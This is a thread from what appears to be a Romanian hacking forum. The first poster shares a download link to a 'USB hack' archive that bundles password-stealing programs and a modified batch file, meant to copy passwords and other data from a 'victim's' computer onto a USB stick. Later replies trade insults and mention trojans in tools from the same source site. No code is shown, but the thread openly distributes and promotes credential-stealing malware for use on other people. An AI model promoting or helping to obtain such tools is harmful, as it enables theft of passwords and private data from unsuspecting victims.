Jump to content
Gonzalez

Inregistreaza pe USB toate parolele dintr-un sistem.

Recommended Posts

Downloadati acest fisier ca este mult mai complet si ofera mai multe date despre victima. L-am luat de pe hellsoft si am mai adaugat din alta parte unele stealere si am modificat in fisierul batch ca sa poata sa ruleze , sper ca va vor ajuta mult mai mult...bafta.

Link: FileShare Download USB hack Mai complet.rar

Daca mai aveti si voi puteti completa sa avem in final date cat mai multe despre calculatorul victimei

Mars ba de'aici cu hellsoftu' ma-tii!!

Link to comment
Share on other sites

Mars ba de'aici cu hellsoftu' ma-tii!!

Ba da esti dobitoc ba? De ce ma injuri ma cretinule , eu doar am precizat sursa sa nu zica cineva ca am zis ca l-am facut eu.Cred ca tu ar trebui sa te duci in mortii ma-tii la oi si nu sa stai pe astfel de forumuri. Rog moderatorii sa imi scuze limbajul , dar nu am putut sa ma abtin la astfel de dobitoci

Link to comment
Share on other sites

probabil a zis asta pentru ca o parte din programele de pe hellsoft ar fi virusate(nu stiu cat e de adevarata afirmatia pentru ca nu verifica acel site, totusi am vazut mai multe tutoriale legate de softuri chiar vandute de acel site care aveau viermi sau troieni in ele, unul din ele este control de la distanta versiunea 3, in momentul in care instalezi clientul automat se instaleaza si un server - server care in mod normal ar trebuii sa il dai victimei, si care vine cu executabil separat - care poate fi accesat cu clientul tocmai instalat dar pentru care iti trebuie si parola, aceasta insa nu o stia persoana care a facut tutorialul dar a incercat logarea la propria adresa ip cu clientul respectiv si a acceptat conexiuena dar nu a acceptat parola)

Link to comment
Share on other sites

probabil a zis asta pentru ca o parte din programele de pe hellsoft ar fi virusate(nu stiu cat e de adevarata afirmatia pentru ca nu verifica acel site, totusi am vazut mai multe tutoriale legate de softuri chiar vandute de acel site care aveau viermi sau troieni in ele, unul din ele este control de la distanta versiunea 3, in momentul in care instalezi clientul automat se instaleaza si un server - server care in mod normal ar trebuii sa il dai victimei, si care vine cu executabil separat - care poate fi accesat cu clientul tocmai instalat dar pentru care iti trebuie si parola, aceasta insa nu o stia persoana care a facut tutorialul dar a incercat logarea la propria adresa ip cu clientul respectiv si a acceptat conexiuena dar nu a acceptat parola)

Sunt perfect de acord cu tine, dar eu am testat aceste programe care sunt in arhiva uploadata de mine si nu este nimic periculos , sunt doar niste programe care fura parole din calculator cu ajutorul unui stick. Eu am spus ca am mai pus si altele in afara de cele puse de cel care a facut acele stealere , printre care sunt si cele puse de Cla1992 , doar ca acesta pus de mine este mai complet si poti afla mai multe parole si informatii din pc-ul victimei si m-am gandit sa nu mai deschid un topic separat pentru asta. In concluzie, nu cred ca trebuia sa ma jigneasca,din moment ce eu nu am jignit pe nimeni pe acest forum si eu nu am vrut decat sa ajut cum probabil faceti toti sau macar majoritatea de aici.

P.S. Sper sa fie ultimul coment pe tema asta ca deja s-a lungit prea mult discutia si cred ca ceilalti s-au plictisit deja.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...